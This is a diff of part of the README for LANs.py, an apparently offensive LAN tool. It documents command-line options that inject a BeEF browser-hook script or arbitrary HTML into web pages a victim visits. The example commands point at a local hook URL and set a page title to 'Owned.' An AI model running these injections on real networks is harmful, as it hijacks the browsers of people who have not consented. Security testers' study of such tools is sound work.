DanMcInerney/LANs.py/README.md

 python LANs.py -b http://192.168.0.5:3000/hook.js
 ```

 Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits.
+This just wraps the argument in <script> tags so you can really enter any location of a javascript file.
+Attempts to insert it after the first </head> tag found in the page's HTML.

 ``` shell
 python LANs.py -c '<title>Owned.</title>'
 ```

 Inject arbitrary HTML into pages the victim visits.
-First tries to inject it after the first `<head>` and failing that injects prior to the first `</head>`.
+First tries to inject it after the first <head> tag and failing that, injects prior to the first </head> tag.
 This example will change the page title to 'Owned.'

 ### Read from pcap: